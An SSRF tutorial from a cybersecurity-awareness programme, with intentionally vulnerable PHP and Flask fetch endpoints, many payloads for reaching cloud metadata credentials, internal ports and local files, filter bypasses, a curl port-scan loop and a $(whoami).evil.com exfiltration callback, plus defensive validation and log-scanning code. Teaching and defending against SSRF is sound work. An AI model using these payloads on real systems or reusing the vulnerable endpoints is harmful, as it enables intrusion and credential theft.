SSRF: When Your Server Becomes a Nosy Hacker — Part 1 🔍
This write-up has been prepared under the guidance of Amish Patel, Lay Patel at Hacker4Help as part of our learning initiative on cybersecurity awareness.
When your backend gets too curious and ends up being the hacker’s sidekick 😂
🎬 Scene 1: The Curious Case of the Chatty Server
Let’s imagine your server is like your slightly naive friend Bob.
Now, Bob’s job is to fetch stuff for you — pictures, JSON data, maybe even a cat video if you ask nicely.
But what if an attacker walks up and says:
“Hey Bob, can you go to this URL for me? Totally normal. Not sketchy at all. Definitely not http://localhost:1337/admin.”
And Bob, bless his trusting soul, says: “Sure, buddy! Anything for a user!” 🫡
What Is SSRF, Really?
Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.
Technical Definition:
SSRF occurs when a web application accepts a user-supplied URL and retrieves the contents of this URL, but does not validate it against an allowlist of permitted domains or IP addresses.
The Attack Vector:
The attacker leverages the server’s network position and privileges to:
- Access internal services not exposed to the internet
- Bypass firewall restrictions
- Perform port scanning on internal networks
- Access cloud metadata services
- Potentially escalate to Remote Code Execution (RCE)
Funny Analogy: Bob the Backend and the Forbidden Fridge 🤡
Bob: “I’m just a backend doing my job.”
Attacker: “Go open that fridge labeled ‘For Employees Only.’”
Bob: Opens it without question
Fridge: Alarms blaring, database leaking, credentials falling like Jenga blocks
Real Exploit Flow 🔥
1. Vulnerable Endpoint Discovery
// Vulnerable PHP code example
<?php
if (isset($_GET['url'])) {
    $url = $_GET['url'];
    $content = file_get_contents($url); // VULNERABLE: any scheme, any host, no validation
    echo $content;
}
?>
# Vulnerable Python Flask example
from flask import Flask, request
import requests

app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    response = requests.get(url)  # VULNERABLE: user-controlled URL fetched as-is
    return response.text
2. Attack Vectors and Payloads
A. Internal Network Reconnaissance
# Port scanning internal network
http://target.com/fetch?url=http://127.0.0.1:22
http://target.com/fetch?url=http://127.0.0.1:80
http://target.com/fetch?url=http://127.0.0.1:443
http://target.com/fetch?url=http://127.0.0.1:3306 # MySQL
http://target.com/fetch?url=http://127.0.0.1:5432 # PostgreSQL
http://target.com/fetch?url=http://127.0.0.1:6379 # Redis
http://target.com/fetch?url=http://127.0.0.1:27017 # MongoDB
B. Cloud Metadata Exploitation
# AWS EC2 Metadata
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://target.com/fetch?url=http://169.254.169.254/latest/user-data/
# Google Cloud Metadata
http://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/
http://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure Metadata
http://target.com/fetch?url=http://169.254.169.254/metadata/instance?api-version=2017-08-01
C. File System Access (if supported)
# Local file inclusion via file:// protocol
http://target.com/fetch?url=file:///etc/passwd
http://target.com/fetch?url=file:///etc/hosts
http://target.com/fetch?url=file:///proc/self/environ
http://target.com/fetch?url=file:///var/log/apache2/access.log
D. Internal Application Access
# Admin panels
http://target.com/fetch?url=http://localhost/admin
http://target.com/fetch?url=http://127.0.0.1:8080/manager/html
# Internal APIs
http://target.com/fetch?url=http://internal-api.company.local/users
http://target.com/fetch?url=http://192.168.1.100/api/config
Basic SSRF Exploitation Techniques 🛠️
1. Simple IP Address Bypasses
A. Alternative IP Representations
# Decimal notation (127.0.0.1 = 2130706433)
http://target.com/fetch?url=http://2130706433/
# Octal notation
http://target.com/fetch?url=http://0177.0.0.1/
# Hexadecimal notation
http://target.com/fetch?url=http://0x7f000001/
# Mixed representations
http://target.com/fetch?url=http://127.1/
http://target.com/fetch?url=http://127.0.1/
http://target.com/fetch?url=http://0x7f.1/
B. DNS Rebinding Attacks
# Using services like nip.io
http://target.com/fetch?url=http://127.0.0.1.nip.io/
http://target.com/fetch?url=http://localhost.127.0.0.1.nip.io/
# Custom DNS records pointing to internal IPs
http://target.com/fetch?url=http://internal.evil.com/ # Resolves to 127.0.0.1
2. URL Encoding and Obfuscation
# Single URL encoding
http://target.com/fetch?url=http%3A%2F%2F127.0.0.1%2F
# Double URL encoding
http://target.com/fetch?url=http%253A%252F%252F127.0.0.1%252F
# Unicode encoding
http://target.com/fetch?url=http://①②⑦.⓪.⓪.①/
# Using redirects to bypass filters
http://target.com/fetch?url=http://evil.com/redirect.php?to=127.0.0.1
3. Protocol Exploitation
A. HTTP/HTTPS Variations
# Standard HTTP
http://target.com/fetch?url=http://127.0.0.1/
# HTTPS (if SSL/TLS not validated)
http://target.com/fetch?url=https://127.0.0.1/
# Non-standard ports
http://target.com/fetch?url=http://127.0.0.1:8080/
http://target.com/fetch?url=http://127.0.0.1:9000/
B. File Protocol
# Linux/Unix systems
http://target.com/fetch?url=file:///etc/passwd
http://target.com/fetch?url=file:///proc/version
http://target.com/fetch?url=file:///home/user/.ssh/id_rsa
# Windows systems
http://target.com/fetch?url=file:///c:/windows/system.ini
http://target.com/fetch?url=file:///c:/boot.ini
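The vulnerable fetch endpoints earlier and every bypass listed in this section come down to one missing control: the server never checks where the URL actually points before fetching it. Below is an added example of that check (written for this write-up, not code from Hacker4Help or any library). It assumes a Python backend like the Flask one above; the resolver argument is a hypothetical hook so the gate can be tested without live DNS.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}  # rejects file://, gopher://, dict:// and friends

def parse_ip_literal(host):
    """Address object if host is any numeric form, else None. inet_aton goes first
    because it applies the C library's shorthand rules: 2130706433, 0x7f000001,
    0177.0.0.1, 127.1 and 0x7f.1 all become 127.0.0.1 and slip past string filters."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        pass
    try:
        return ipaddress.ip_address(host)  # IPv6 literals such as ::1
    except ValueError:
        return None

def is_internal(ip):
    """True for any destination an outbound fetcher should never contact."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is loopback in disguise
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def resolve_host(host):  # every address the name maps to; one internal record fails it
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_safe_url(url, resolver=resolve_host):
    """Gate a user-supplied URL before the server fetches it; returns (ok, reason).
    Still fetch with redirects disabled and re-check every Location hop, and connect
    to the validated address, not the name, or a redirect or a changing DNS answer
    between check and connect walks straight past this."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} is not allowed"
    if not (host := parts.hostname):
        return False, "URL has no host"
    literal = parse_ip_literal(host)
    if literal is not None:
        addrs = [literal]
    else:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (OSError, ValueError) as exc:
            return False, f"cannot resolve {host}: {exc}"
    for ip in addrs:
        if is_internal(ip):
            return False, f"{host} maps to internal address {ip}"
    return True, "ok"
```

Call `is_safe_url` on the raw `url` parameter and return 400 on a `False` result instead of fetching; the reason string is for your logs, not the client.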
🎯 High-Impact SSRF Attack Scenarios
1. AWS EC2 Instance Metadata Exploitation
# Step 1: Check if metadata service is accessible
http://target.com/fetch?url=http://169.254.169.254/
# Step 2: Get instance metadata
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/
# Step 3: Enumerate IAM roles
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Step 4: Get IAM role name (example: WebServerRole)
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole
# Step 5: Extract AWS credentials from response
{
  "Code" : "Success",
  "LastUpdated" : "2024-01-15T10:30:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...",
  "SecretAccessKey" : "...",
  "Token" : "...",
  "Expiration" : "2024-01-15T16:30:00Z"
}
2. Internal Service Discovery
# Common internal service ports
PORTS=(22 23 25 53 80 110 143 443 993 995 1433 3306 3389 5432 5984 6379 8080 8443 9200 27017)
# Automated scanning script concept
for PORT in "${PORTS[@]}"; do
    echo "Testing port $PORT..."
    curl "http://target.com/fetch?url=http://127.0.0.1:$PORT"
    curl "http://target.com/fetch?url=http://localhost:$PORT"
    curl "http://target.com/fetch?url=http://0.0.0.0:$PORT"
done
3. Database Access Through SSRF
# MySQL (default port 3306)
http://target.com/fetch?url=http://127.0.0.1:3306/
# PostgreSQL (default port 5432)
http://target.com/fetch?url=http://127.0.0.1:5432/
# MongoDB (default port 27017)
http://target.com/fetch?url=http://127.0.0.1:27017/
# Redis (default port 6379)
http://target.com/fetch?url=http://127.0.0.1:6379/
# CouchDB (default port 5984)
http://target.com/fetch?url=http://127.0.0.1:5984/_all_dbs
Blind SSRF Detection 🎪
1. DNS-Based Detection
# Using Burp Collaborator
http://target.com/fetch?url=http://abc123.burpcollaborator.net/
# Using custom DNS server
http://target.com/fetch?url=http://ssrf-test.evil.com/
# DNS exfiltration
http://target.com/fetch?url=http://$(whoami).evil.com/
2. HTTP-Based Detection
# Using HTTP callbacks
http://target.com/fetch?url=http://requestbin.net/r/abc123
# Using webhook.site
http://target.com/fetch?url=https://webhook.site/unique-id
# Time-based detection
http://target.com/fetch?url=http://httpbin.org/delay/10
3. Error-Based Detection
# Connection timeout (closed port)
http://target.com/fetch?url=http://127.0.0.1:12345/
# Connection refused
http://target.com/fetch?url=http://192.168.1.1:22/
# DNS resolution failure
http://target.com/fetch?url=http://nonexistent-domain-12345.com/
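The payload lists above (sections A to D, the encoding tricks and the detection callbacks) are also what a defender can hunt for in the web server's own access logs. The following is an added example for this write-up, not code from the original post: it scans constructed combined-log-format lines, peels off however many layers of percent-encoding the `url` parameter carried, and flags targets that are a metadata host, an internal address, a shorthand numeric host, or a non-web scheme. The sample lines, host list and field layout are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlparse
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2024:10:30:01 +0000] "GET /fetch?url=https%3A%2F%2Fexample.com%2Fimg.png HTTP/1.1" 200 512
10.0.0.9 - - [15/Jan/2024:10:30:07 +0000] "GET /fetch?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 98
10.0.0.9 - - [15/Jan/2024:10:30:09 +0000] "GET /fetch?url=http%253A%252F%252F127.0.0.1%252Fadmin HTTP/1.1" 200 211
10.0.0.9 - - [15/Jan/2024:10:30:11 +0000] "GET /fetch?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 500 0
10.0.0.9 - - [15/Jan/2024:10:30:13 +0000] "GET /fetch?url=http%3A%2F%2F2130706433%2F HTTP/1.1" 200 211
"""  # constructed sample lines, not from any real server
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) ', re.M)
# Hosts with no legitimate reason to appear in a user-supplied fetch URL.
SENSITIVE_HOSTS = {"169.254.169.254", "metadata.google.internal", "metadata", "localhost"}
# Labels of decimal, octal or 0x-hex digits only: 2130706433, 0177.0.0.1, 0x7f.1
NUMERIC_HOST_RE = re.compile(r"(?:0x[0-9a-f]+|[0-9]+)(?:\.(?:0x[0-9a-f]+|[0-9]+))*")

def fully_decode(value, max_rounds=3):
    """Peel off repeated percent-encoding (the double-encoding bypass)."""
    for _ in range(max_rounds):
        if (decoded := unquote(value)) == value:
            break
        value = decoded
    return value

def classify_target(url):
    """Why the fetch target is suspicious, or None for an ordinary web URL."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return f"non-web scheme {parts.scheme!r}"
    host = parts.hostname or ""
    if host in SENSITIVE_HOSTS:
        return f"sensitive host {host}"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a name, or a shorthand numeric form that is not a plain literal
        return f"numeric-looking host {host}" if NUMERIC_HOST_RE.fullmatch(host) else None
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return f"internal address {ip}"
    return None

def scan_log(text):
    """(client, timestamp, raw url parameter, reason) for every suspicious fetch."""
    hits = []
    for match in REQUEST_RE.finditer(text):
        client, stamp, path = match.groups()
        for raw in parse_qs(urlparse(path).query).get("url", []):
            reason = classify_target(fully_decode(raw))
            if reason:
                hits.append((client, stamp, raw, reason))
    return hits
```

A string match on the client's hostname is only a first pass; for blind SSRF the stronger signal is the server's own egress (connections from the web tier to link-local, loopback or unexpected external hosts), which this scanner does not see.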
Real-World Impact Examples 📊
1. Capital One Data Breach (2019)
- Attack Vector: SSRF against AWS EC2 metadata service
- Impact: 100+ million customer records compromised
- Technique: Exploited web application firewall to access EC2 metadata
- Lesson: Always restrict access to cloud metadata services
2. Shopify SSRF (2017)
- Bounty Paid: $25,000
- Attack Vector: Internal GraphQL endpoint access
- Impact: Internal service enumeration and sensitive data access
- Technique: Bypassed IP restrictions using DNS rebinding
3. Uber SSRF (2016)
- Bounty Paid: $8,000
- Attack Vector: Internal admin panel access
- Impact: Access to internal Uber services
- Technique: Simple localhost bypass using 127.0.0.1
🎬 Part 1 Conclusion: Bob’s First Lesson
Bob: “Wait, so you’re telling me I’ve been helping attackers this whole time?”
Security Team: “Unfortunately, yes. But don’t worry, we’re going to teach you some advanced tricks to spot these attacks!”
Attacker: “Uh oh, they’re getting smarter…”
Stay tuned for Part 2 where we dive deep into advanced exploitation techniques and learn how Bob finally becomes a security-aware backend!
End of Part 1 🎯